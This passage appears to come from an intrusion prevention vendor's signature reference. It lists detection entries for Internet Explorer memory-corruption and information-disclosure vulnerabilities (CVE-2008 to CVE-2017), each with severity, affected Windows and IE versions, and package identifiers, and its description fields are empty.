File-Text_Microsoft-Internet-Explorer-JS-Information-Disclosure-CVE-2011-1245

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 2008, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, MS2011-04, CVE2011, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Internet-Explorer-JS-Information-Disclosure-CVE-2011-1245
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Jscript.dll-Regular-Expression-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 8.0, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2015-10, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-697-5211
Last changed: sgpkg-ips-697-5211
Vulnerability: Microsoft-Internet-Explorer-Jscript.dll-Regular-Expression-Use-After-Free
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Jscript9.dll-Typedarray-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 11.0, MS2016-06, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-775-5211
Last changed: sgpkg-ips-1334-5242
Vulnerability: Microsoft-Internet-Explorer-Jscript9.dll-Typedarray-Use-After-Free
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Jserrortostring-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, CVE2017, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1045-5242
Last changed: sgpkg-ips-1588-5242
Vulnerability: Microsoft-Internet-Explorer-Jserrortostring-Heap-Buffer-Overflow
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Layout-Grid-Char-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2011-06, CVE2011, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Internet-Explorer-Layout-Grid-Char-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Layout-Grid-Char-Memory-Corruption-2

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2011-06, CVE2011, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-409-4219
Vulnerability: Microsoft-Internet-Explorer-Layout-Grid-Char-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Layout-Grid-Char-Memory-Corruption-3

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2011-06, CVE2011, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-514-5211
Last changed: sgpkg-ips-514-5211
Vulnerability: Microsoft-Internet-Explorer-Layout-Grid-Char-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Layout-Use-After-Free

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, Internet Explorer 9.0, MS2012-09, CVE2012, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-480-5211
Last changed: sgpkg-ips-480-5211
Vulnerability: Microsoft-Internet-Explorer-Layout-Use-After-Free
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Layouts-Handling-CVE-2011-0094

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 2008, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, MS2011-04, CVE2011, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Internet-Explorer-Layouts-Handling-CVE-2011-0094
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Layouts-Handling-CVE-2011-0094-2

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 2008, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, MS2011-04, CVE2011, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-682-5211
Last changed: sgpkg-ips-682-5211
Vulnerability: Microsoft-Internet-Explorer-Layouts-Handling-CVE-2011-0094
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Link-Properties-Handling-CVE-2011-1250

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 7, Windows 2008 R2, Windows 2008, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2011-06, CVE2011, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Internet-Explorer-Link-Properties-Handling-CVE-2011-1250
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Location-Property-Cross-Domain-Scripting

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2008-10, CVE2008, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1589-5242
Vulnerability: Microsoft-Internet-Explorer-Location-Property-Cross-Domain-Scripting
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Loop-Counter-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, Windows Server, MS2012-07, CVE2012, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-528-5211
Last changed: sgpkg-ips-528-5211
Vulnerability: Microsoft-Internet-Explorer-Loop-Counter-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Marquee-Object-Handling-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2009-04, CVE2009, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-721-5211
Vulnerability: HTTP_Microsoft-Internet-Explorer-Marquee-Object-Handling-Memory-Corruption
Microsoft-Internet-Explorer-Marquee-Object-Handling-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2009-1917

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2009-07, CVE2009, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1589-5242
Vulnerability: Microsoft-Internet-Explorer-Memory-Corruption-CVE-2009-1917
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2010-0244

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows XP, Windows 2000, Windows 2003, Windows Vista, Windows 2008, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2010-01, CVE2010, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1589-5242
Vulnerability: Microsoft-Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2010-0244
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3123

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 8.0, Internet Explorer 9.0, Internet Explorer 10.0, MS2013-06, CVE2013, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-526-5211
Last changed: sgpkg-ips-1343-5242
Vulnerability: Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3123
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3124

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 9.0, MS2013-06, CVE2013, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-526-5211
Last changed: sgpkg-ips-526-5211
Vulnerability: Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3124
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3125

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 10.0, MS2013-06, CVE2013, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-526-5211
Last changed: sgpkg-ips-526-5211
Vulnerability: Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3125
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3139

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 8.0, MS2013-06, CVE2013, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-526-5211
Last changed: sgpkg-ips-526-5211
Vulnerability: Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3139
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3873

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 10.0, MS2013-10, CVE2013, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-544-5211
Last changed: sgpkg-ips-544-5211
Vulnerability: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3873
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3873-2

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 10.0, MS2013-10, CVE2013, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-547-5211
Last changed: sgpkg-ips-547-5211
Vulnerability: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3873
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3874

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 9.0, MS2013-10, CVE2013, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-544-5211
Last changed: sgpkg-ips-544-5211
Vulnerability: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3874
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3875

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 8.0, Internet Explorer 9.0, MS2013-10, CVE2013, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-544-5211
Last changed: sgpkg-ips-544-5211
Vulnerability: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3875
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3885

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 10.0, MS2013-10, CVE2013, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-544-5211
Last changed: sgpkg-ips-544-5211
Vulnerability: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3885
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3893

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2013-09, CVE2013, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-543-5211
Last changed: sgpkg-ips-543-5211
Vulnerability: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3893
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3893-2

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2013-09, CVE2013, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-548-5211
Last changed: sgpkg-ips-548-5211
Vulnerability: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3893
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3914

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2013-11, CVE2013, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-550-5211
Last changed: sgpkg-ips-550-5211
Vulnerability: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3914
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3916

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 8.0, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2013-11, CVE2013, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-550-5211
Last changed: sgpkg-ips-550-5211
Vulnerability: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3916
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3917

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2013-11, CVE2013, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-550-5211
Last changed: sgpkg-ips-550-5211
Vulnerability: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3917
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-5048

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2013-12, CVE2013, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-555-5211
Last changed: sgpkg-ips-555-5211
Vulnerability: Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-5048
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-5049

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, Internet Explorer 9.0, MS2013-12, CVE2013, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-555-5211
Last changed: sgpkg-ips-555-5211
Vulnerability: Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-5049
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-5049-2

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, Internet Explorer 9.0, MS2013-12, CVE2013, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-556-5211
Last changed: sgpkg-ips-556-5211
Vulnerability: Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-5049
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-5051

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 10.0, MS2013-12, CVE2013, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-555-5211
Last changed: sgpkg-ips-555-5211
Vulnerability: Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-5051
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-5052

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, MS2013-12, CVE2013, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-555-5211
Last changed: sgpkg-ips-555-5211
Vulnerability: Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-5052
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1762

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2014-06, CVE2014, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-591-5211
Last changed: sgpkg-ips-1279-5242
Vulnerability: Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1762
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1766

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 8.0, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2014-06, CVE2014, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-591-5211
Last changed: sgpkg-ips-591-5211
Vulnerability: Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1766
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1785

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 11.0, MS2014-06, CVE2014, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-591-5211
Last changed: sgpkg-ips-591-5211
Vulnerability: Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1785
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1789

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows 7, Windows 2008 R2, Windows 8, Windows RT, Windows 2012, Any Hardware, Internet Explorer 10.0, MS2014-06, CVE2014, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-591-5211
Last changed: sgpkg-ips-591-5211
Vulnerability: Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1789
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1791

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows 2003, Windows Vista, Windows 7, Windows 2008 R2, Windows 8, Windows RT, Windows 2012, Windows 2008, Windows 8.1, Windows 2012 R2, Any Hardware, Internet Explorer 7.0, Internet Explorer 8.0, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2014-06, CVE2014, Windows 2003 not specific, Windows Vista not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-591-5211
Last changed: sgpkg-ips-591-5211
Vulnerability: Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1791
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1795

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows Vista, Windows 7, Windows 2008 R2, Windows 8, Windows 2012, Windows 2008, Windows 8.1, Windows 2012 R2, Any Hardware, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2014-06, CVE2014, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-591-5211
Last changed: sgpkg-ips-591-5211
Vulnerability: Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1795
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1800

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 8.0, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2014-06, CVE2014, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-591-5211
Last changed: sgpkg-ips-591-5211
Vulnerability: Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1800
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1802

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 10.0, Internet Explorer 11.0, MS2014-06, CVE2014, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-591-5211
Last changed: sgpkg-ips-591-5211
Vulnerability: Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1802
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1804

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 8.0, MS2014-06, CVE2014, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-591-5211
Last changed: sgpkg-ips-591-5211
Vulnerability: Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1804
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-2820

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows XP SP2, Windows Vista, Windows 7, Windows 2008 R2, Windows 8, Windows 2012, Windows 2008, Windows 8.1, Windows 2012 R2, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2014-08, CVE2014, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-599-5211
Last changed: sgpkg-ips-599-5211
Vulnerability: Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-2820
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-2823

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows 7, Windows 2008 R2, Windows 8, Windows 8.1, Windows 2012 R2, Any Hardware, Internet Explorer 11.0, MS2014-08, CVE2014, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-599-5211
Last changed: sgpkg-ips-599-5211
Vulnerability: Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-2823
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-2824

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows 2003, Windows XP SP2, Windows 7, Windows 2008 R2, Windows 2008, Any Hardware, Internet Explorer 8.0, MS2014-08, CVE2014, Windows 2003 not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-599-5211
Last changed: sgpkg-ips-599-5211
Vulnerability: Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-2824
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-4050

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows 7, Windows 2008 R2, Windows 8, Windows 2012, Windows 8.1, Windows 2012 R2, Any Hardware, Internet Explorer 10.0, Internet Explorer 11.0, MS2014-08, CVE2014, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-599-5211
Last changed: sgpkg-ips-1286-5242
Vulnerability: Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-4050
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-4126

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 10.0, Internet Explorer 11.0, MS2014-10, CVE2014, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-611-5211
Last changed: sgpkg-ips-1589-5242
Vulnerability: Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-4126
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-4127

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, Internet Explorer 9.0, Internet Explorer 10.0, MS2014-10, CVE2014, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-611-5211
Last changed: sgpkg-ips-611-5211
Vulnerability: Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-4127
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-4130

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 11.0, MS2014-10, CVE2014, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-611-5211
Last changed: sgpkg-ips-611-5211
Vulnerability: Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-4130
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-4140

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2014-10, CVE2014, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-611-5211
Last changed: sgpkg-ips-611-5211
Vulnerability: Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-4140
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-8967

